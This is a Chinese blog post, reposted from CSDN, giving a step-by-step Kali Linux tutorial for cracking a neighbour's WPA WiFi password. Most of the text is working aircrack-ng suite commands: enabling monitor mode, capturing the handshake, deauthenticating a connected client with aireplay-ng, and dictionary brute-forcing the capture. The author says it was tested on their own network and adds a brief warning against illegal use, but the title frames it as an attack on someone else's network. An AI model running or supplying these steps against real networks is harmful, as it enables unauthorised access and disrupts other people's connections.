专注于
浏览器插件开发

【kali】kali系统无线渗透获取隔壁老王的wifi密码

  1. 开始之前,需要明确下面的事宜:
    1破解准备:kali、字典、适用于Linux的无线网卡(虚拟机不支持使用物理机内置网卡)
    2网卡推荐:Linux官方推荐的一些网卡,其他网卡不一定可用,选择的时候,慎重!提前咨询清楚。
    3注:整个流程,网卡都不需要连接WiFi

    正式开始:

    检查网卡:
    ifconfig
    开启监听:
    开启网卡monitor模式
    airmon-ng start wlan0 //激活当前网卡(wlan0)激活后,wlan0名称变为wlan0mon
    再次使用命令,查看网卡信息,网卡名称已更改为wlan0mon
    ifconfig
    探索目标wifi:(必须要已有或将有设备连接)
    使用命令开始嗅探无限流量
    airodump-ng wlan0mon //后面是网卡名
    如果前面都是可以检测到网卡,或者曾经成功检测到过WiFi信号 ,但是这里没有检测到WiFi信号,戳这里。
    捕获握手信息数据包:
    使用命令开始捕获握手信息数据包(需要已连接到该热点设备的mac地址:STATION)
    airodump-ng –bssid 88:D7:**:**:02:00 -c 13  -w ~/ wlan0mon
    参数解释:
    –bssid  : ap,即路由器的mac地址
    -c       :信道,初步嗅探时已经得到
    -w       :输出捕获了四次握手信息的数据包
    ~/       :输出目录为根目录,可修改
             :后面还能跟输出文件名,为.cap格式,默认为-01.cap,多次捕获按顺序后延
    wlan0mon :所使用的网卡
    效果如下!
    图示表示监听目标路由,下面station那里表示,现在没有手机WiFi开启,一般会显示附近开启WiFi的终端(手机等),如果之前已经获得过了握手包,会自动出现下面的图(测试的话)
    一般正常破解是不会直接出现Handshake的,需要重新打开一个新的终端(Terminal)选择一个STATION(客户端)来执行命令!
    aireplay-ng -0 2 -a 88:D7:**:**:02:00 -c D4:50:3F:FB:21:39 wlan0mon
    -0:采用Deauth攻击模式,后面跟攻击次数
    -a: 路由(AP)的mac地址
    -c:选择的连接该AP的客户端的mac地址
    接下来就可以得到握手信息,成功后,在之前的终端右上角会出现目标AP(路由器)的mac地址信息
    关闭网卡:
    airmon-ng stop wlan0mon
    字典暴力破解:
    得到上述的ACK信息之后,会自动在主目录(你没有指定其他目录的话)保存 -01.cap文件(捕获多次会按照序号顺延)
    选择自己本地准备好的爆破字典
    执行命令:
    aircrack-ng   -w  psw.txt  -01.cap
    psw.txt    密码字典文件
    -01.cap   //在这里我遇到了一个问题,如果遇到了可以参考下这里:传送门
    如图,便可以得到WiFi的密码,但是请不要用于非法破解蹭网和除研究学习外的其他用途。
    因为我是对自己的网络进行的测试,密码是写在字典里的。这种字典爆破对于一些弱口令和纯数字类的密码,是比较容易的,但是对于长字符串,字母数字特殊符号混合加密的网络,破解能力几乎为0.因为破解方需要有一个超级超级超级大的密码库才行,显然不太实际。
    所以,平时要设置密码,需要注意密码强度。
    注:
    最后,关闭网卡之后,可能会连带关闭NetworkManager,需要手动输入命令开启:
    /etc/init.d/network-manager start
    ————————————————
    版权声明:本文为CSDN博主「kinnisoy」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
    原文链接:https://blog.csdn.net/kinnisoy/article/details/90240575
未经允许不得转载:磁钉插件网 » 【kali】kali系统无线渗透获取隔壁老王的wifi密码
分享到: 更多 (0)

猜你喜欢

  • 暂无文章

评论 抢沙发

评论前必须登录!